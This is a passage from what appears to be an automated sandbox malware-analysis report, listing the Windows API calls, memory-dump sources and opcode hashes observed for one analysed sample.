                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: File$AttributesCreate
                                                                • String ID:
                                                                • API String ID: 415043291-0
                                                                • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                APIs
                                                                • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                                • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectoryErrorLast
                                                                • String ID:
                                                                • API String ID: 1375471231-0
                                                                • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                                • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(00000000), ref: 701A2AF7
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2965840144.00000000701A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 701A0000, based on PE: true
                                                                • Associated: 00000005.00000002.2965760512.00000000701A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965858277.00000000701A3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965878197.00000000701A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_701a0000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: c90d68a00b14a2df6ecd13565271d53ba9eef669d59c0467d0ec5a323a846406
                                                                • Instruction ID: 3727aef5cd029d2b4076968ac92cc24ec310892eca6af605dc751f08a12417c7
                                                                • Opcode Fuzzy Hash: c90d68a00b14a2df6ecd13565271d53ba9eef669d59c0467d0ec5a323a846406
                                                                • Instruction Fuzzy Hash: 1241A0FB500204DFDB21DFA9DD82B9E3775EB94718F3044A9F605E7A60C774A880AB60
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: wsprintf
                                                                • String ID:
                                                                • API String ID: 2111968516-0
                                                                • Opcode ID: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                                • Instruction ID: 7f5a5d1368c13d317d2e99ee4d98356b480ceadea176dd08c5889da6900fd1c4
                                                                • Opcode Fuzzy Hash: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                                • Instruction Fuzzy Hash: 7E21B730D04299FADF328BA885886AEBB749F11314F1440BFE491B73D1C2BD8A85DB19
                                                                APIs
                                                                • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: FileMove
                                                                • String ID:
                                                                • API String ID: 3562171763-0
                                                                • Opcode ID: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                                • Instruction ID: c16fe538d576f0a812f108a5c598968f2bbae53de2c44bc87e09c6d73b5458c5
                                                                • Opcode Fuzzy Hash: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                                • Instruction Fuzzy Hash: EEF01D3160852496DB20ABA54E49E5F3264DB42769B24033BF422B21D1EABC8542956E
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                                  • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: FilePointerwsprintf
                                                                • String ID:
                                                                • API String ID: 327478801-0
                                                                • Opcode ID: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                                • Instruction ID: d2cb0ca5e863be2ef59b536234997f243a65a7806d73518010ac019a9530af38
                                                                • Opcode Fuzzy Hash: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                                • Instruction Fuzzy Hash: 7EE09271B00114EED711FBA4AE49DBF77B8EB40315B10403BF102F10C1CABC49128A2E
                                                                APIs
                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileStringWrite
                                                                • String ID:
                                                                • API String ID: 390214022-0
                                                                • Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                                • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                                • Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                                • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
                                                                APIs
                                                                • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: PathSearch
                                                                • String ID:
                                                                • API String ID: 2203818243-0
                                                                • Opcode ID: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                                • Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
                                                                • Opcode Fuzzy Hash: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                                • Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D
                                                                APIs
                                                                • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                • Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
                                                                • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                • Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34
                                                                APIs
                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                                • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                                APIs
                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(701A404C,00000004,00000040,701A403C), ref: 701A293F
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2965840144.00000000701A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 701A0000, based on PE: true
                                                                • Associated: 00000005.00000002.2965760512.00000000701A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965858277.00000000701A3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965878197.00000000701A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_701a0000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 22eca9fcbc3e849fe7c25149fe59ad040887604ea12a7ee42e056305c2857765
                                                                • Instruction ID: e59395c2befdffbdc0131f92e9d0a6e2bd99b2da2246824c0c074aa931634185
                                                                • Opcode Fuzzy Hash: 22eca9fcbc3e849fe7c25149fe59ad040887604ea12a7ee42e056305c2857765
                                                                • Instruction Fuzzy Hash: 0BF092F7508280DFC360CF7A8E447863EE0A398254B22857AF798D6A62E3B45044AB11
                                                                APIs
                                                                • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileString
                                                                • String ID:
                                                                • API String ID: 1096422788-0
                                                                • Opcode ID: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                                • Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
                                                                • Opcode Fuzzy Hash: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                                • Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                • Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
                                                                • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                • Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25
                                                                APIs
                                                                • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                                • Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
                                                                • Opcode Fuzzy Hash: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                                • Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: FilePointer
                                                                • String ID:
                                                                • API String ID: 973152223-0
                                                                • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                APIs
                                                                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                  • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,771B23A0), ref: 0040527A
                                                                  • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                  • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                  • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                                  • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                                  • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                                  • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
